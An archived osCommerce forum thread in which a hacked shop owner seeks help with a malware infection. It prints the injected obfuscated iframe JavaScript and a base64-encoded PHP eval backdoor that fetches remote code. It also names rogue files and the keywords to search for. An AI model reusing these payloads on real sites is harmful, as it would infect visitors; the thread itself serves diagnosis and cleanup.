Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Some strange Trojan viirus.


Tsport

Recommended Posts

I don't see any malicious files, or scripts or iframes in the source.

 

Check the contents of the .htaccess in the root folder for redirects to other sites.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Alex,

 

I agree with Jim. I did not really find any signs hacker files and received no security messages while looking around your website.

 

 

 

 

Chris

Link to comment
Share on other sites

  • 2 weeks later...

i still got the same problem!!! some times i got some strange trojan secure report!

when i just get in the index and in the source i found this

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->

 

and the trojan comes from http://8931.in/dududu.js

 

i have tried to find this source code in all the pages: header.php index.php and etc and i found nothing!

and btw the four nombers always change sometimes it can be like 5436.in/ and so on...

and when i got no trojan reports the source is witchout this code

 

 

</script>

<form name="quick_find" action="http://billing.iqxtech.com/advanced_search_result.php" method="get"><input type="text" name="keywords" value="חיפוש מהיר..." id="txtSearch" size="15" onFocus="Clear(this)" autocomplete="off" maxlength="50" class=searchHeader> <input type="hidden" name="osCsid" value="f257a22ba87b3527fbac707b28c7140f">

<input type=image src=layout/images/search_btn.gif align="absmiddle" >

 

</form></div></div><br class="clearfloat" />

<div id="mainContent">

 

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->

 

<!-- body //-->

 

up to <div style="display: block;

the source is in header.php

 

heres the site http://iqxtech.com

Link to comment
Share on other sites

Hack files currently in your images folder:

 

google033ca56fcb20d1b7.php

googlec6e11a4aebef71ed.php

googleeeae99914d1a2ad8.php

 

Hackers hide their code.

 

Look for code in your files that has these php keywords:

 

base64_decode or eval or gzinflate

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I don't see anything like the code you posted in the page source when I access the site.

 

If you found it in the header then use a text editor and look in /includes/header.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

i have deleted the

google033ca56fcb20d1b7.php

googlec6e11a4aebef71ed.php

googleeeae99914d1a2ad8.php

 

in image folder and the hack has gone :P now i need to protect my folders

Link to comment
Share on other sites

how should i look for them in my php files? with what program?

Thank you!

 

 

If you use most web editing tools (like Dreamweaver) you will have a search or find function and usually options on how it does that.

 

So you search or find for "base64_decode" (for example) and select entire site. Then you will get a list of files with that code in them.

In the case of this example it is usually at the top of every php file in the site and it is usually easier to upload a clean copy of your files than fix every file.

Search the forums or Google for how to fix your system to prevent specific things you find.

 

If you have a way to get a files count on your host (maybe 400-several thousand files) you can check that and when no users are on it should only change when you add something. If it changes without you adding something than someone else added some file somewhere.

Sometimes you can find those by sorting by date/time on the host and seeing what the "new" files(s) are.

 

Of course do all the regular security measures detailed elsewhere on the forums, like file/dir permission, htaccess, etc.

 

Good luck.

Link to comment
Share on other sites

I wouldn't suggest using Dreamweaver at all! Use Wingrep to search all files once downloaded onto your local machine.

 

 

 

Chris

Link to comment
Share on other sites

You also need to patch your website so that an attacker cannot return and repeat the same action again.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

what patch? can you link to the patch please?

i have found this code:

<?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibmkiPTczYyQ7InB0dGgiPTczaCQ7InN0YXRzIj03M3okJykpO2V2YWwoczM3KCc7XSJUTkVHQV9SRVNVX1BUVEgiW1JFVlJFU18kPTNhdSQnKSk7ZXZhbChzMzcoJzspInJlbGJtYVIiICwieGVkbmFZIiAsInJldmloY3JhX2FpIiAsInRvQk5TTSIgLCJwcnVsUyIgLCJlbGdvb0ciKHlhcnJhID0gNzN1JCcpKTtldmFsKHMzNygnfX07bHJ1JCBvaGNlO10xW2xydSQgPSBscnUkIDspbHJ1JCwiIW9nISIoZWRvbHB4ZSA9IGxydSR7KSkiIW9nISIsbHJ1JChydHNydHMoIGZpOykpXSJUU09IX1BUVEgiW1JFVlJFU18kKGVkb2NuZWxydS4iPWgmIi4pM2F1JChlZG9jbmVscnUuIj1iJiIuXSJSRERBX0VUT01FUiJbUkVWUkVTXyQuIj1pIi4iP3AiLiJocC4iLjczYyQuIi83M2MkLiIuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLyIuIjoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZAID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyApKSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4gIi8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?>

in Header.php

can you decode it ?:P interesting whats typed in there

Link to comment
Share on other sites

The eval code you posted when decoded contains a function that when called allows eval code strings to be called in reverse (basically reading code backwards).

 

It looks to me like its a logging script that logs the site visitors ip and downloads some code (probably a file with a virus in it) from a url on a server at http:// ininininin.in/ as well as places a cookie in your browser while bypassing and search engines that may view that page.

 

As for the patch link, there are quite a few posts in this forum with extensive lists of instructions of how to patch your site to clean up affected pages and patch the security holes so that attackers cannot further compromise your security. Most of them are in reference to this type of problem.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

  • 2 weeks later...

I've also got the "Trojan Virus" that keeps being blocked by Avast. So far, an item has been removed, only for it to return. Not sure what to do.

 

States: Trojan Horse

JS:IFrame-AU[Trj}

 

 

Please help. Any help would be SO appreciated. Thank you so much in advance.

 

Jeanne

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...